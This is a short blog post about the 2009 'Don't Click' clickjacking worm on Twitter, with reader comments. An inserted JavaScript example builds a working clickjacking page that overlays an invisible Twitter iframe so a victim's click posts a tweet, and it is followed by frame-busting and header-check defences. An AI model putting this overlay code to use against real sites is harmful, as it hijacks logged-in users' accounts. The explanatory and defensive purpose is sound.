The “Don’t Click” TwitterBomb
So this Twitter bomb is spreading like wildfire – it works by overlaying the Twitter page, loaded in an invisible iframe, on top of the ‘Don’t click’ button (spotted by @peterc).
As most people stay logged in to Twitter, when they click the ‘Don’t click’ button (who can resist?!), the click actually lands on Twitter’s own update button inside the hidden frame and submits a tweet on your behalf.
I’m not sure if this is exploiting any vulns at all. Some people are crying out ‘XSRF!!’ etc., but I’m not sure this is the case.
See the attached screenies for a Firebug explanation :)
See Simon Willison’s presentation on web security for a more thorough explanation of clickjacking and other exploits.
Update: looks like Twitter have reacted.
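The overlay trick described above, together with the two defences that matter (a frame-busting script of the kind Twitter rolled out, and the response header browsers enforce), as an added example that is not code from the original post or from Twitter. It assumes the framed URL pre-fills the tweet through a `?status=` query parameter, that the pixel offsets are illustrative, and that the shape of the buster script is written from memory rather than copied from twitter.com.

```javascript
// Added example, not code from the original post or from Twitter: a
// reconstruction of the "Don't Click" overlay plus the two defences against it.
// Assumptions not stated on the page: the framed URL pre-fills the tweet via a
// ?status= query parameter, and the pixel offsets are illustrative.

// Part 1: the attacker's page. The target site is loaded in an iframe that is
// fully transparent (opacity:0) but still receives clicks, stacked above the
// bait button and shifted so the site's own submit button sits exactly under
// the victim's cursor. The resulting request is sent by the genuine page with
// the victim's session cookie and the page's own anti-CSRF token, which is why
// CSRF tokens do not help here: the attacker forges the click, not the request.
function buildAttackPage(targetBase, tweetText, bait, submitInFrame) {
  const framedUrl = targetBase + '/home?status=' + encodeURIComponent(tweetText);
  // Offset the frame so (submitInFrame.top, submitInFrame.left) lands on the bait.
  const frameTop = bait.top - submitInFrame.top;
  const frameLeft = bait.left - submitInFrame.left;
  return [
    '<!doctype html><html><body>',
    `<button style="position:absolute;top:${bait.top}px;left:${bait.left}px;` +
      'z-index:1">Don\'t click</button>',
    `<iframe src="${framedUrl}" scrolling="no" style="position:absolute;` +
      `top:${frameTop}px;left:${frameLeft}px;width:800px;height:600px;` +
      'border:0;opacity:0;z-index:2"></iframe>',
    '</body></html>',
  ].join('\n');
}

// Part 2: the framed site's script-based defence (the shape of what Twitter
// added, written from memory, not copied from twitter.com). If this document
// is not the top-level window, navigate the top window to our own URL, which
// tears down the attacker's page. Takes the window as a parameter so it can be
// exercised outside a browser. Caveat: script busters can be defeated (an
// iframe with the HTML5 sandbox attribute can forbid scripts or top-navigation
// inside it), so treat this as defence in depth, not the primary control.
function bustFrame(win) {
  if (win.top !== win.self) {
    win.top.location.href = win.self.location.href;
    return true; // we were framed and broke out
  }
  return false; // top-level; nothing to do
}

// Part 3: the primary defence is a response header the browser enforces before
// any script runs. Given a map of response headers, report which anti-framing
// control applies: CSP frame-ancestors wins over X-Frame-Options, and null
// means anyone may frame the page.
function frameProtection(headers) {
  const lower = {};
  for (const name of Object.keys(headers)) lower[name.toLowerCase()] = headers[name];
  const csp = lower['content-security-policy'] || '';
  const m = /frame-ancestors\s+([^;]+)/i.exec(csp);
  if (m) return { mechanism: 'csp-frame-ancestors', value: m[1].trim() };
  const xfo = lower['x-frame-options'];
  if (xfo) return { mechanism: 'x-frame-options', value: xfo.trim().toUpperCase() };
  return null;
}
```

Running `buildAttackPage('https://twitter.com', "Don't click", {top: 100, left: 50}, {top: 300, left: 200})` produces a page whose frame is shifted by -200px/-150px so the framed submit button sits under the bait; `frameProtection` is the check to run against a site's response headers to see whether the page can be framed at all.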

Clay Johnson said,
February 12, 2009 @ 7:27 pm
We did a little research over on Sunlight Labs as well on Don’t Click:
http://bit.ly/kj1z9
ruby on rails textmate said,
July 18, 2010 @ 12:15 am
I thought it was going to be some boring old post, but it really compensated for my time. I will post a link to this page on my blog. I am sure my visitors will find that very useful.